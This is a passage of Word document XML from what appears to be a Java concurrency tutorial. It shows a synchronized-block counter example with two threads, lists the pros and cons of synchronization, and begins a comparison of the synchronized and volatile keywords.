    <w:p w14:paraId="5D047EC0"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synchronized (this) {  // Synchronize only the critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F6AC3"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F7A9C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F55E3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630ECD8A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F02370"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C66A4"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A6B15"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFAE5BD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4C46B8" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B41F07E"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public class TestSynchronized {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3B79C"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3897D176"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Counter counter = new Counter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334B6406" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4910F2"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 Create multiple threads that will call the increment method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041BFACB"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Thread t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4071005C"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for (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A278F41"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counter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF958A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D08C2AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04211DC6" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057FEDF4"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Thread t2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D865E3"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for (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C96A70"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counter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410534A3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC124E8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1D45D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542CC5D5"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t1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE523F"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        t2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E961ADF" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F91AAA4"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324C0FF3"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t1.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0CA3DD"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t2.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF70CCF"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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B32B88"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2299BB14"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAAAA5B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745658D2"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 Print the final count (should be 2000 if synchronization works correctly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A628E"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System.out.println("Final Count: " + counter.getCount());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C3BB93"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFD602" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C2023D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCAD35" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>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The increment() method contains a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized block</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The synchronized (this) block ensures that only one thread can increment the count at a time, while the rest of the method remains unsynchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDBC4C" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>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This approach can lead to better performance because it minimizes the time spent holding the lock compared to synchronizing the entire method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D74C4" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Block vs. Synchronized Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C557625" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Method</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Easier to use, and locks the entire method, which may be inefficient if you need to synchronize only a small part of the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2357F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Block</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More flexible, as it allows you to synchronize only specific critical sections of your code, which may improve performance if the synchronized portion is small.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB0AA0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advantages of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66036C85" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Synchronization ensures that shared data is not accessed by multiple threads simultaneously, avoiding data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6726B3" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Safety</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a way to achieve thread safety by preventing race conditions in concurrent programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C446896" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Disadvantages of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D07E0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Performance Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Acquiring and releasing locks introduces overhead, which may degrade performance, especially in highly concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3FDDB" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Improper use of synchronization may lead to deadlocks if threads acquire locks in an inconsistent order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEA077" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Contention</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple threads waiting for the same lock can lead to thread contention, affecting performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1EA9E7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268F75B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00CE4B95" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In Java, synchronized threads help manage shared resources in a multithreaded environment by ensuring that only one thread can access the critical section of code at a time. However, synchronization should be used judiciously, as improper use can lead to performance bottlenecks, deadlocks, and other issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A19A82" w14:textId="7E34340B" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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F0F04B3">
          <v:rect id="_x0000_i1817" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7236B" w14:textId="756CC497" w:rsidR="008A25EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00C836C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="_Toc196307742"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between synchronized and volatile keyword</w:t>
      </w:r>
      <w:r w:rsidR="008A25EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="262"/>
    </w:p>
    <w:p w14:paraId="36558F39" w14:textId="72E3742A" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Both the synchronized and volatile keywords are used in Java to manage concurrency and thread safety, but they serve different purposes and have different behaviors. Here's a comparison between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6455C0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A6AA3" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319B86C" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The synchronized keyword is used to ensure that only one thread can access a method or block of code at a time. It is used to manage access to shared resources and prevent </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It guarantees mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4CC77" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4EB25" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The volatile keyword is used to indicate that a variable's value may be changed by multiple threads. It ensures that updates to a variable are visible to all threads, providing </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> guarantees. It does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
